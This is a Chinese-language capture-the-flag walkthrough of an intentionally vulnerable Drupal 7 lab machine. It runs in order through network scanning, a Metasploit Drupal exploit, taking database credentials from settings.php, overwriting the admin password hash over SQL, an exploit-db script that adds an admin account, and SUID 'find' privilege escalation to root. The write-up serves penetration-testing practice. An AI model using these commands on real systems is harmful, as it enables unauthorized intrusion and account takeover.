环境配置

首先环境配置,需要将靶机和kali设置为NAT模式

image-20260602162211135

image-20260602162509753

当前网段是192.168.100.0/24

信息搜集

nmap扫一下网段,主机探测

1
nmap -sn 192.168.100.0/24

image-20260602162729704

192.168.100.134就是我们要打的靶机。全量扫描一下

1
nmap -T4 -A 192.168.100.134

image-20260602175838661

web指纹识别

1
whatweb -v 192.168.100。134

image-20260602181253499

信息搜集如下:

端口服务信息:

1
2
3
4
5
22/tcp:ssh服务开启,版本:OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)

80/tcp:HTTP服务开启,版本:Apache httpd 2.2.22 ((Debian))

111/tcp: rpcbind服务开启,版本:2-4 (RPC #100000)

web指纹信息:

1
2
3
4
5
6
7
Apache/2.2.22 (Debian)

PHP 5.4.45

CMS Drupal 7

JQuery

漏洞利用

漏洞利用关键在CMS Drupal 7,使用metasploit查找一下相关漏洞

image-20260602195757083

1
2
use 1
show options

填写攻击目标靶机的ip

1
2
set RHOSTS 192.168.100.134
run

拿到shell

image-20260602200629339

看一下flag1.txt文件的内容

image-20260602200838777

每个优秀的CMS都需要一个配置文件——你的也不例外。

寻找一下配置文件,Drupal的核心配置文件时settings.php

1
2
shell
find / -name settings.php

image-20260602201740224

image-20260602202158816

暴力破解和字典攻击并非获取访问权限的唯一途径(而且你肯定需要访问权限)。

配置给出了数据库的配置信息先登入一下看看

image-20260602204234798

这里直接连不行,meterpreter弹得时非交互式shell,修改为交互式shell

1
python -c 'import pty;pty.spawn("/bin/bash")'

image-20260602204718382

连接数据库

image-20260602204847680

1
2
USE drupaldb;
show tables;

image-20260602205324417

1
select * from users;

image-20260602210424676

这里储存的密码时加密后的,接下来就是想办法获取或者修改admin用户的密码,或者新建admin用户。

解法1:修改admin用户的密码

搜索与密码有关的文件

1
find / -name *password*

image-20260602211326413

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/php
<?php

/**
* Drupal hash script - to generate a hash from a plaintext password
*
* Check for your PHP interpreter - on Windows you'll probably have to
* replace line 1 with
* #!c:/program files/php/php.exe
*
* @param password1 [password2 [password3 ...]]
* Plain-text passwords in quotes (or with spaces backslash escaped).
*/

if (version_compare(PHP_VERSION, "5.2.0", "<")) {
$version = PHP_VERSION;
echo <<<EOF

ERROR: This script requires at least PHP version 5.2.0. You invoked it with
PHP version {$version}.
\n
EOF;
exit;
}

$script = basename(array_shift($_SERVER['argv']));

if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) {
echo <<<EOF

Generate Drupal password hashes from the shell.

Usage: {$script} [OPTIONS] "<plan-text password>"
Example: {$script} "mynewpassword"

All arguments are long options.

--help Print this page.

--root <path>

Set the working directory for the script to the specified path.
To execute this script this has to be the root directory of your
Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
running on Unix). Use surrounding quotation marks on Windows.

"<password1>" ["<password2>" ["<password3>" ...]]

One or more plan-text passwords enclosed by double quotes. The
output hash may be manually entered into the {users}.pass field to
change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

./scripts/{$script}
\n
EOF;
exit;
}

$passwords = array();

// Parse invocation arguments.
while ($param = array_shift($_SERVER['argv'])) {
switch ($param) {
case '--root':
// Change the working directory.
$path = array_shift($_SERVER['argv']);
if (is_dir($path)) {
chdir($path);
}
break;
default:
// Add a password to the list to be processed.
$passwords[] = $param;
break;
}
}

define('DRUPAL_ROOT', getcwd());

include_once DRUPAL_ROOT . '/includes/password.inc';
include_once DRUPAL_ROOT . '/includes/bootstrap.inc';

foreach ($passwords as $password) {
print("\npassword: $password \t\thash: ". user_hash_password($password) ."\n");
}
print("\n");

这时加密逻辑,根据这个脚本就可以把admin用户的密码修改

image-20260602212018008

$S$DZXhDAifDn72xnWf4kocKQlxBEttPRs1bLWMDPISHzAIjdlgvfyB

修改admin的密码

1
update users set pass="$S$DZXhDAifDn72xnWf4kocKQlxBEttPRs1bLWMDPISHzAIjdlgvfyB" where name="admin";

访问192.168.100.134,admin/123456登入找到flag3

image-20260602212448520

解法2:添加admin权限用户

使用searchsploit查找一下drupal的漏洞

image-20260603145630002

下载下来

image-20260603145824868

使用方法:python2 34992.py -t http://目标IP -u 你要的账号 -p 你要的密码

1
python2 34992.py -t http://192.168.100.134 -u abc -p 123456

image-20260603150155335

image-20260603150218340

登入成功。

特殊权限可以帮助找到 passwd - 但你需要执行该命令才能弄清楚如何获取隐藏的内容

很明显需要提取,先看一下/etc/passwd

image-20260602212728464

查看/home/flag4的文件的内容

image-20260602212930674

下一步就考虑提取

1
find / -user root -perm -4000 -print 2>/dev/null

image-20260602213809484

使用find命令提权

1
/usr/bin/find . -exec /bin/sh -p \; -quit

image-20260602214115223

提权成功在root目录得到flag

image-20260602214201642